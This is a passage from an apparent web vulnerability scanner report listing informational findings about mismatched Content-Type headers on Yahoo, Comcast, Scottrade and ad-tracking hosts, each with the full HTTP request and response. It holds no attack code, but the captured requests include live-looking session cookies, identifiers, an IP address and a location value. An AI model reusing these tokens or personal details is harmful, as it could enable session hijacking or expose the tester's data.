function placeFooter(){var C=$("#bd");var E=$("#ft-outer");var A=C.offset().top+C.outerHeight(true);var B=E.outerHeight(true);var D=($(window).height()>(A+B))?"absolute":"static";E.css({position:D})}f
...[SNIP]...

25.30. http://maps.yahoo.com/services/bizloc/america/bizloc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.yahoo.com
Path:   /services/bizloc/america/bizloc

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /services/bizloc/america/bizloc?q=&intl=us&mag=13&zoom=13&rn=1315331123041 HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://maps.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: keep-alive, close
Vary: Accept-Encoding
Content-Type: application/json; charset=utf-8
Content-Length: 2

{}

25.31. http://new.music.yahoo.com/chartsHpJS.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://new.music.yahoo.com
Path:   /chartsHpJS.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /chartsHpJS.js HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:39 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 3153


YAHOO.music.chartsHPDropDown = new function()
{
this.init = function()
{
   dd=document.getElementById('ymusic-chartselect');
   dd.onchange=function() {
       if(this.selectedIndex!=undefined) {
           YAH
...[SNIP]...

25.32. http://new.music.yahoo.com/rhap_status.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://new.music.yahoo.com
Path:   /rhap_status.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /rhap_status.html?ts=1315331140072 HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://l.yimg.com/us.yimg.com/i/us/mus/swf/ymwp/swfproxy-6.0.9.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: max-age=3600, private
Last-Modified: Fri, 30 Apr 2010 13:03:51 GMT
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 90

OK
<!-- nmusic134.music.mud.yahoo.com compressed/chunked Tue Sep 6 05:46:07 PDT 2011 -->

25.33. http://new.music.yahoo.com/ymusicStayConnected/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://new.music.yahoo.com
Path:   /ymusicStayConnected/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /ymusicStayConnected/ HTTP/1.1
Host: new.music.yahoo.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; YMT=d=dj0xJnQ9MCZ0cz0xMzE1MjUxODE1&s=RKnJfnz7ookDnnWANSk9kA--; YMP_VOLUME=0.5; mlap_us=%7B%22d%22%3A%5B%5B%22yahooVideosContainer%22%2C%22ySearch%22%2C%22yMusicImages%22%2C%22yahooAlbums%22%2C%22yNews%22%2C%22Youtube%22%5D%2C%5B%22yahooTracksPopular%22%2C%22yConcerts%22%2C%22lastfm%22%2C%22pandora%22%2C%22flickr%22%2C%22iTunes%22%2C%22Amazon%22%5D%5D%2C%22m%22%3A%22%22%2C%22i%22%3A%22us%22%2C%22v%22%3A%221.1%22%2C%22c%22%3A0%7D; adxid=016e3b4e6615bdb5; BA=t=1315331123; adxf=3078081@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:39 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 926

<div id="ymusic-stayconnected-hp">
   <h2>Stay Connected to Your Music</h2>
   <ul>
               <li>
           <a id="ymusic-stayconnected1" href="http://new.music.yahoo.com/apps/facebook/" class="ymusic-link-facebook">
...[SNIP]...

25.34. http://pixel.fetchback.com/serve/fb/pdc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3018 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: act=1_1315103291; opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315309925_1315309925595:3279793012126635; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315309925; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 11:52:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

<!-- opt out exists or ip filtered -->

25.35. http://realestate.yahoo.com/autocomplete/cities.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://realestate.yahoo.com
Path:   /autocomplete/cities.html

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /autocomplete/cities.html?query=100 HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 79

<!-- fe6.rel.sp2.yahoo.com compressed/chunked Tue Sep 6 05:49:46 PDT 2011 -->

25.36. http://realestate.yahoo.com/robots.txt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://realestate.yahoo.com
Path:   /robots.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /robots.txt HTTP/1.1
Host: realestate.yahoo.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 17 Jun 2011 07:06:48 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 121

User-agent: Googlebot
Disallow: /xml/

User-agent: *
Disallow: /xml/

Sitemap: http://realestate.yahoo.com/sitemap.xml

25.37. http://sales.liveperson.net/hcp/html/mTag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=21807557 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH

Response

HTTP/1.1 200 OK
Content-Length: 17291
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=21807557
Last-Modified: Sun, 13 Mar 2011 22:27:52 GMT
Accept-Ranges: bytes
ETag: "e0f243e4cde1cb1:28bd"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:48:54 GMT

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...

25.38. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading.html_@3Fcid%3DAM%7C46%7C1542%7C1206%7C131_@26rid%3DL%7C1736690_@26amvid%3DOPT_OUT_@26symbol%3DSPY HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313325:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:48:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...

25.39. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading_@2Ffund-your-account.html HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT; u=4e6616acaf0c5; f8=258981:et:8:ETF:07:4:; i_8=10:37:191:18:0:50961:1315313324:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:49:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313355:B2|10:37:190:18:0:50961:1315313354:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:49:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 787

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...

25.40. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/59689.70851972699 HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT; u=4e6616acaf0c5; f8=258981:et:8:ETF:07:4:; i_8=10:37:191:18:0:50961:1315313324:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:49:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1506

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

25.41. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545

Summary

Severity:   Information
Confidence:   Firm
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/78868.26389003545 HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1506

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

25.42. http://sensor2.suitesmart.com/sensor4.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-2-0-0-0-1315313090-0; path=/; domain=.suitesmart.com; expires=Sun, 04-Mar-2012 12:44:50 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:44:50 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

25.43. http://sitesearch.comcast.com/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /?cat=qc&q=i HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331594|check#true#1315329794|PC#1315327839174-766376.19#1316539335; s_pers=%20s_dfa%3Dcomcastdotcomprod%7C1315331533264%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%255D%7C1473182534676%3B%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331534692%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20s_cc%3Dtrue%3B%20ev41%3Dxss%3B%20stc18%3Dxss%3B%20SC_LINKS%3D%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B; bn_u=6923713561343025788

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:22:20 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 336
Connection: close
Content-Type: text/html; charset=UTF-8

["i","","international long distance rates","","internet connection settings","","international calling rates","","international long distance","","internet and phone bundles","","internet parental co
...[SNIP]...

25.44. http://sitesearch.comcast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sitesearch.comcast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
